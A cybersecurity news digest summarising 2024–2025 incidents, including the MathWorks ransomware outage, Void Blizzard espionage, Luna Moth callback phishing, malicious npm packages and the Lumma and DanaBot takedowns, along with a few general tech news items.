Daily Brief

Ransomware attack targeted MathWorks, impacting its flagship MATLAB software, affecting over five million users globally. MathWorks confirmed the ransomware incident following a significant outage that started on May 18, initially reported as multiple application issues. Critical disruptions include MATLAB's Licensing Center remaining offline, severely affecting new license verifications for users. Although recovery efforts led by cybersecurity experts have restored most of MATLAB's functionalities, some services still show degraded performance or remain offline. The impact extended to educational sectors, particularly affecting students during peak exam periods, resulting in missed deadlines and forced workarounds such as software piracy. MathWorks has notified federal law enforcement and is progressing towards full recovery, albeit slowly, with ongoing updates posted on their status page. Some commercial customers were less affected, having their own MATLAB licensing servers, contrasting with the critical issues faced in educational use scenarios.

Russian-affiliated hackers, identified as Void Blizzard, have conducted espionage targeting various sectors in NATO countries and North America. The group has been active since at least April 2024, focusing on government, defense, transportation, media, NGOs, and healthcare. Attacks are primarily aimed at collecting intelligence to support Russian strategic goals, particularly targeting entities supporting Ukraine. The hackers use phishing techniques, stealing login credentials to infiltrate organizations and extract sensitive emails and files. Recent tactics include spear-phishing using fake Microsoft Entra authentication pages, targeting over 20 NGOs in Europe and the U.S. After initial breaches, the group uses automation tools to harvest data from Exchange Online and Microsoft Graph extensively. The group's activities sometimes overlap with other Russian state actors, indicating shared intelligence objectives. Microsoft has observed a shift toward more direct methods of credential theft, emphasizing the need for robust cybersecurity measures in targeted sectors.

A Russian cyberespionage group called Void Blizzard compromised Dutch police data in September 2024, stealing officers' work-related information. Linked to Russia, Void Blizzard accessed the Global Address List of a police employee account using stolen cookie credentials. The Netherlands' intelligence agencies warn that Void Blizzard may have targeted other national organizations due to their consistent patterns. This group, also known as Laundry Bear, has been active since at least April 2024, focusing on Ukraine and NATO member states. Void Blizzard’s activities are aligned with Russian strategic goals, especially in penetrating governmental, defense, and critical infrastructure sectors. The group employs advanced techniques like spear-phishing and credential theft to breach target defenses and extract sensitive data. Microsoft highlights the threat's significant risk to NATO states and allies to Ukraine, especially in critical sectors like transportation and defense.

**Artificial intelligence (AI) is significantly boosting productivity in various enterprises, necessitating the management of an increasing number of non-human identities (NHIs) such as service accounts and bots.** **For every human identity, there are approximately 45 machine identities, each requiring secure secrets like API keys or certificates for authentication.** **Non-human identities, unlike humans, often lack strict policies for credential rotation or permission scoping, presenting a significant security risk.** **The proliferation of AI and machine learning models has accelerated the risk associated with these NHIs by enabling faster and more widespread access to sensitive data.** **Security vulnerabilities are introduced when AI tools like chatbots inadvertently expose secrets, potentially leaking sensitive information to unauthorized parties.** **Implementation of best practices such as auditing data sources, centralizing management of NHIs, preventing secrets leaks, improving logging security, and restricting AI data access is crucial for mitigating risks.** **Raising developer awareness about the importance of secure AI deployment practices is essential for fostering a secure AI implementation environment.** **Organizations that prioritize robust governance of machine identities and secure AI deployments will be better positioned to harness the advantages of AI without compromising on security.**

ReliaQuest discovered a new SEO poisoning campaign exploiting employee searches for payroll portals to commit fraud. Hackers create fake login pages that mimic company payroll portals, tricking employees into entering their credentials. Once credentials are stolen, attackers gain access to the payroll systems and redirect paychecks to their own accounts. The fraudulent campaign uses compromised home routers and mobile networks to disguise attacker traffic, evading standard security tools. Attackers specifically target mobile devices due to their lesser security measures and external network connections, which complicates detection and mitigation efforts. The campaign, detected in May 2025, is part of an ongoing operation with similar incidents traced back to late 2024. Cybersecurity responses are hampered as the fake sites avoid scanning and inclusion in threat indicator feeds by exploiting web and router vulnerabilities. Residential and mobile IP addresses are used to further conceal the fraudulent login attempts, making the attacks difficult to track and attribute.

Adidas disclosed a data breach originating from a hacked customer service provider, exposing certain customer data. The stolen customer information did not include payment details or passwords, only contact information. Adidas has engaged information security experts for a comprehensive investigation and has taken steps to contain the incident. The company is notifying affected consumers and relevant data protection and law enforcement authorities, following legal obligations. Adidas has a recent history of data breaches, with incidents in Turkey and South Korea affecting customer information. Details such as the name of the affected service provider, the exact number of affected customers, and whether Adidas’ own network was compromised remain undisclosed. Adidas reaffirms commitment to consumer privacy and security, expressing regret for the inconvenience caused.

The FBI has issued alerts about Luna Moth, a cyber extortion group targeting law firms using sophisticated social engineering tactics. Luna Moth employs callback phishing and poses as IT support to trick victims into granting remote access to their systems. Through telephone conversations and linked emails, victims are lured into installing malware, enabling unauthorized data access and theft. The attackers use legitimate remote access tools like Zoho Assist and AnyDesk, making their actions less likely to be detected by standard security measures. Recently, Luna Moth adapted its strategy, directly contacting targets and pretending to be their company’s IT personnel, guiding them to join remote access sessions. The group escalates privileges and employs tools like Rclone and WinSCP to exfiltrate sensitive data, which is then used for extortion. Cybersecurity firms have tracked Luna Moth's high-frequency callback phishing schemes, primarily targeting the legal and financial sectors in the U.S. The campaign involves registering helpdesk-themed domains to appear more credible, employing methods that are hard to detect and counter.

Russia-aligned TAG-110 targets Tajikistan's government entities with macro-enabled Word documents. The spear-phishing campaign marks a tactic shift from using HTML Application (.HTA) loaders to Word templates. These cyber espionage operations aim to influence regional politics or security amid sensitive events. TAG-110 overlaps with Russian state-sponsored APT28, known for targeting European embassies and various governmental bodies across Central Asia and East Asia. The campaign involves Word documents disguised as government-related content for delivering malware. The macro in the Word docs places the template in a startup folder, ensuring persistence and establishing communication with a command-and-control server. The nature of secondary payloads from the campaign remains uncertain, but likely involves further deployment of malware like HATVIBE or CHERRYSPY.

Over 60 malicious npm packages and eight VS Code extensions were identified, designed to steal data including IPs, DNS servers, and user directories. These packages transmit stolen information to a Discord-controlled endpoint, and have collective downloads exceeding 9,000 times. The infected packages include sandbox evasion techniques and target multiple operating systems like Windows, macOS, and Linux. Some npm packages mimic legitimate helper libraries, while deploying destructive payloads that can delete files or crash systems. Threat actors disguise harmful code within legitimate features in VS Code extensions to steal cryptocurrency wallet credentials. The abuse of open-source repositories and marketplaces by attackers underscores the ongoing risk of supply chain attacks. A sophisticated phishing attack using npm packages has also been connected to this malicious activity, showcasing hybrid cyber threat tactics. The comprehensive cybersecurity threat illustrated by these incidents highlights the importance of vigilant monitoring and robust defenses against evolving cyber threats.

Law enforcement and private sector collaboration led to the takedown of major malware infrastructures, namely Lumma Stealer and DanaBot. Charges have been filed against 16 individuals allegedly involved in the development and operation of DanaBot, a versatile malware used for stealing data and hijacking banking sessions. DanaBot has been notably repurposed by Russian state hackers for more complex intrusion campaigns, underlining the dangers of commodity malware being adapted for state-sponsored activities. Approximately 2,300 domains and 300 servers constituting the command-and-control network for Lumma information stealer were seized, significantly disrupting its operations. Additionally, 650 domains used for launching ransomware attacks have been neutralized in recent actions under Operation Endgame, aimed at combating international cybercrime. This article underscores the importance of international cooperation in tackling cyber threats and highlights the evolving nature of malware utilization by nation states.

The CISO's guide emphasizes the importance of transitioning from static, audit-based privacy programs to dynamic, continuous monitoring to ensure web privacy. It reveals a concerning trend: 70% of major US websites continue to track users via cookies even after opting out, thus failing to uphold their privacy commitments. Continuous web privacy validation tools are advocated to ensure compliance by actively monitoring websites and third-party scripts in real time. The article discusses the inadequacy of traditional reactive privacy measures, which often lead to undetected privacy violations and regulatory penalties. Examples include a global retailer and a bank facing severe financial penalties and reputational damage due to undetected third-party scripts that violated privacy regulations. Less than a quarter of companies are confident in their privacy compliance; continuous validation can improve confidence by integrating seamlessly with existing security processes, minimizing additional operational overhead. Urges CISOs to prepare for impending stringent regulations planned for 2025, including the EU AI Act and New Hampshire's NHPA, by implementing robust web privacy validation now.

A security breach at TeleMessage exposed sensitive communications involving over 60 government workers, affecting a White House staffer and Secret Service members. The leaked data included messages from the Trump administration and was publicly reported by Reuters and appeared on Distributed Denial of Secrets. Europol announced Operation Endgame II, resulting in 20 arrests and the disruption of five major malware groups including Qakbot and Danabot, seizing €21.2 million. Cybersecurity experts suggest a new predictive model for patch prioritization, potentially enhancing the current practices surrounding vulnerability management. CISA and other agencies are utilizing systems like the Exploit Prediction Scoring System and proposing a new likely exploited vulnerabilities list to better predict and address security threats. GoDaddy reached a settlement with the FTC over severe security failings that went unnoticed for three years, leading to customer outages and infected sites. A vast trove of 184 million unique login credentials was discovered unsecured online by a vpnMentor researcher, suspected to be compiled using infostealer malware.

China officially approved a national online identification number system intended to streamline netizen access to various online services through a single logon interface. This system allows citizens to have a central Cyberspace ID, issued after their identities are verified, to access both government and private services, enhancing online security. Participation in acquiring these online numbers is not mandatory, and service platforms cannot discriminate against those choosing to retain traditional access methods. The Cyberspace ID app has been adopted moderately with over 16 million downloads, facilitating above 12.5 million authentications amidst China's massive population. Xiaomi announced the creation of custom silicon chips for its devices, showcasing its long-term commitment to leadership in core technologies. NTT Docomo, the original creator of emoji, plans to retire its custom emoji set, reflecting changes in graphic communication preferences on mobile devices. Taiwanese company MediaTek is advancing in the semiconductor industry with the near completion of its 2nm chip technology, promising integration of AI across its product range.

Glitch announced it will end app hosting and user profiles on July 8 due to high operational costs and abuse issues. CEO Anil Dash stated the decision stems from the platform's outdated architecture and the availability of better alternatives in the market. Existing users can access the dashboard until year's end to download project codes and set up URL redirects, which will be active until at least 2026. All paid Glitch Pro subscriptions will be honored until the shutdown date, with refunds issued for any remaining paid time. Glitch.com has been a prominent figure in the web development community since its launch in 2017, especially noted for its friendly interface and real-time collaboration features. The decision to close was influenced by rising hosting costs and the increasing misuse of the platform by bad actors. Glitch is focusing on guiding users through this transition, with plans to release a detailed guide and ongoing support through the community forum.

Cybersecurity experts revealed a malware campaign using bogus software installers, mimicking LetsVPN and QQ Browser, to distribute the Winos 4.0 framework. The malicious campaign employs a complex loader, Catena, capable of staging payloads in memory to evade detection by traditional antivirus systems. The Winos 4.0 malware, associated with the threat actor group Void Arachne or Silver Fox, has been active throughout 2025, showing evolving tactics to avoid antivirus detection. Key targets of the malware include entities in Taiwan, with phishing efforts disguised as communications from the National Taxation Bureau. Winos 4.0 operates primarily against Chinese-language users, implementing features like data harvesting, remote access, and potential DDoS capabilities using a plugin-based system. The Catena chain embeds shellcode in .ini files and uses reflective DLL injection to maintain persistence and stealth on infected hosts. Recent adjustments in the malware's deployment include the use of a PowerShell command designed to bypass Microsoft Defender and additional checks for specific antivirus processes.